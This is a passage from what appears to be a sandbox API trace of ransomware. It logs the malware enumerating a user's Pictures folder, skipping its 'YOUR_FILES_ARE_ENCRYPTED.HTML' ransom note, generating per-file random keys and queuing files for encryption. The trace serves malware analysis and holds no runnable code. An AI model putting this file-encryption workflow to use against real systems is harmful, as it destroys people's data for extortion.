param_1="3F") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="B3") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="67") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="F2") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="F9") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="2C") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="07") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="39") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="1E") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="7E") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="A8") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="A1") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="50") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="62") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="07") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="59") returned 2 [0125.173] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="C4") returned 2 [0125.174] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="E6") returned 2 [0125.174] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="FB") returned 2 [0125.174] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="43") returned 2 [0125.174] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="61") returned 2 [0125.174] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\2kDg spxPqaDX4dJd2b.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\2kDg spxPqaDX4dJd2b.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\2kDg spxPqaDX4dJd2b.bmp" [0125.174] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.175] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.179] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68d21900, ftCreationTime.dwHighDateTime=0x1d6fe70, ftLastAccessTime.dwLowDateTime=0xbd95edd0, ftLastAccessTime.dwHighDateTime=0x1d703c1, ftLastWriteTime.dwLowDateTime=0xbd95edd0, ftLastWriteTime.dwHighDateTime=0x1d703c1, nFileSizeHigh=0x0, nFileSizeLow=0x12c90, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="33wBFjgt8pPn.bmp", cAlternateFileName="33WBFJ~1.BMP")) returned 1 [0125.179] StrStrIW (lpFirst="33wBFjgt8pPn.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.179] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\33wBFjgt8pPn.bmp") returned 59 [0125.179] PathFindExtensionW (pszPath="33wBFjgt8pPn.bmp") returned=".bmp" [0125.179] lstrlenW (lpString=".bmp") returned 4 [0125.179] PathFindExtensionW (pszPath="33wBFjgt8pPn.bmp") returned=".bmp" [0125.179] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\33wBFjgt8pPn.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\c9wqy_h\\33wbfjgt8ppn.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.180] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=76944) returned 1 [0125.180] GetProcessHeap () returned 0x600000 [0125.181] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.181] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="F7") returned 2 [0125.181] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="9C") returned 2 [0125.181] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="89") returned 2 [0125.181] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="28") returned 2 [0125.182] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="7C") returned 2 [0125.182] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="D7") returned 2 [0125.182] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="CF") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="55") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="98") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="73") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="51") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="9F") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="6F") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="10") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="11") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="64") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="92") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="AA") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="1C") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="01") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="E8") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="EF") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="C8") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="A0") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="7E") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="06") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="10") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="7B") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="3A") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="81") returned 2 [0125.182] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="96") returned 2 [0125.183] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="61") returned 2 [0125.183] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\33wBFjgt8pPn.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\33wBFjgt8pPn.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\33wBFjgt8pPn.bmp" [0125.183] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.183] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.188] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x797eb190, ftCreationTime.dwHighDateTime=0x1d6fb06, ftLastAccessTime.dwLowDateTime=0x1249c1e0, ftLastAccessTime.dwHighDateTime=0x1d70164, ftLastWriteTime.dwLowDateTime=0x1249c1e0, ftLastWriteTime.dwHighDateTime=0x1d70164, nFileSizeHigh=0x0, nFileSizeLow=0x3ef0, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="81v6QqYDbFk.jpg", cAlternateFileName="81V6QQ~1.JPG")) returned 1 [0125.188] StrStrIW (lpFirst="81v6QqYDbFk.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.188] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\81v6QqYDbFk.jpg") returned 58 [0125.188] PathFindExtensionW (pszPath="81v6QqYDbFk.jpg") returned=".jpg" [0125.188] lstrlenW (lpString=".jpg") returned 4 [0125.188] PathFindExtensionW (pszPath="81v6QqYDbFk.jpg") returned=".jpg" [0125.189] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\81v6QqYDbFk.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\c9wqy_h\\81v6qqydbfk.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.190] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=16112) returned 1 [0125.190] GetProcessHeap () returned 0x600000 [0125.190] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.191] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="3C") returned 2 [0125.191] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="F3") returned 2 [0125.191] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="58") returned 2 [0125.191] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="D6") returned 2 [0125.191] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="71") returned 2 [0125.191] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="F4") returned 2 [0125.191] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="1C") returned 2 [0125.191] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="43") returned 2 [0125.191] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="9C") returned 2 [0125.191] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="D8") returned 2 [0125.191] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="33") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="06") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="A1") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="7E") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="B0") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="9B") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="8A") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="5F") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="A2") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="21") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="8B") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="30") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="EB") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="D7") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="63") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="59") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="86") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="CA") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="8E") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="8A") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="62") returned 2 [0125.192] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="18") returned 2 [0125.193] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\81v6QqYDbFk.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\81v6QqYDbFk.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\81v6QqYDbFk.jpg" [0125.193] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.193] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.199] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa106d4a0, ftCreationTime.dwHighDateTime=0x1d70834, ftLastAccessTime.dwLowDateTime=0x44c9a6b0, ftLastAccessTime.dwHighDateTime=0x1d708c3, ftLastWriteTime.dwLowDateTime=0x44c9a6b0, ftLastWriteTime.dwHighDateTime=0x1d708c3, nFileSizeHigh=0x0, nFileSizeLow=0x11ea4, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="D8pVz.gif", cAlternateFileName="")) returned 1 [0125.199] StrStrIW (lpFirst="D8pVz.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.199] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\D8pVz.gif") returned 52 [0125.199] PathFindExtensionW (pszPath="D8pVz.gif") returned=".gif" [0125.199] lstrlenW (lpString=".gif") returned 4 [0125.199] PathFindExtensionW (pszPath="D8pVz.gif") returned=".gif" [0125.199] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\D8pVz.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\c9wqy_h\\d8pvz.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.200] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=73380) returned 1 [0125.200] GetProcessHeap () returned 0x600000 [0125.200] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.201] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="CD") returned 2 [0125.201] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="C4") returned 2 [0125.201] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="21") returned 2 [0125.201] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="AA") returned 2 [0125.201] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="42") returned 2 [0125.202] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="50") returned 2 [0125.202] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="31") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="31") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="01") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="D4") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="C4") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="B9") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="3E") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="D6") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="BA") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="9E") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="A1") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="0F") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="F2") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="69") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="01") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="D4") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="63") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="D0") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="15") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="22") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="AF") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="EB") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="12") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="8B") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="E1") returned 2 [0125.202] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="77") returned 2 [0125.203] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\D8pVz.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\D8pVz.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\D8pVz.gif" [0125.203] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.203] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.207] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7654be90, ftCreationTime.dwHighDateTime=0x1d6fe37, ftLastAccessTime.dwLowDateTime=0xe2b89ee0, ftLastAccessTime.dwHighDateTime=0x1d6ffb2, ftLastWriteTime.dwLowDateTime=0xe2b89ee0, ftLastWriteTime.dwHighDateTime=0x1d6ffb2, nFileSizeHigh=0x0, nFileSizeLow=0x128ce, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="I64oqwj9FPZQk.jpg", cAlternateFileName="I64OQW~1.JPG")) returned 1 [0125.208] StrStrIW (lpFirst="I64oqwj9FPZQk.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.208] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\I64oqwj9FPZQk.jpg") returned 60 [0125.208] PathFindExtensionW (pszPath="I64oqwj9FPZQk.jpg") returned=".jpg" [0125.208] lstrlenW (lpString=".jpg") returned 4 [0125.208] PathFindExtensionW (pszPath="I64oqwj9FPZQk.jpg") returned=".jpg" [0125.208] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\I64oqwj9FPZQk.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\c9wqy_h\\i64oqwj9fpzqk.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.209] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=75982) returned 1 [0125.209] GetProcessHeap () returned 0x600000 [0125.209] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.209] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="67") returned 2 [0125.209] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="23") returned 2 [0125.209] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="16") returned 2 [0125.210] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="9A") returned 2 [0125.210] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="C2") returned 2 [0125.210] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="64") returned 2 [0125.210] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="69") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="F1") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="1F") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="45") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="2B") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="5D") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="64") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="F8") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="E2") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="4D") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="5F") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="59") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="48") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="78") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="51") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="C1") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="0C") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="F6") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="0F") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="8C") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="4E") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="FF") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="9C") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="9B") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="53") returned 2 [0125.210] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="10") returned 2 [0125.211] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\I64oqwj9FPZQk.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\I64oqwj9FPZQk.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\I64oqwj9FPZQk.jpg" [0125.211] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.211] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.215] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bb0c950, ftCreationTime.dwHighDateTime=0x1d6fcb2, ftLastAccessTime.dwLowDateTime=0x1e8985a0, ftLastAccessTime.dwHighDateTime=0x1d6fe56, ftLastWriteTime.dwLowDateTime=0x1e8985a0, ftLastWriteTime.dwHighDateTime=0x1d6fe56, nFileSizeHigh=0x0, nFileSizeLow=0x5d4, dwReserved0=0x19ec60, dwReserved1=0xfe73738c, cFileName="Prz_nhOiA.jpg", cAlternateFileName="PRZ_NH~1.JPG")) returned 1 [0125.215] StrStrIW (lpFirst="Prz_nhOiA.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.215] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Prz_nhOiA.jpg") returned 56 [0125.215] PathFindExtensionW (pszPath="Prz_nhOiA.jpg") returned=".jpg" [0125.215] lstrlenW (lpString=".jpg") returned 4 [0125.215] PathFindExtensionW (pszPath="Prz_nhOiA.jpg") returned=".jpg" [0125.215] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\C9WQy_h\\Prz_nhOiA.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\c9wqy_h\\prz_nhoia.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.216] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=1492) returned 1 [0125.216] GetProcessHeap () returned 0x600000 [0125.216] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.217] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="33") returned 2 [0125.217] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="84") returned 2 [0125.217] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="86") returned 2 [0125.217] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="75") returned 2 [0125.217] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="A8") returned 2 [0125.217] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="BC") returned 2 [0125.217] wsprintfW 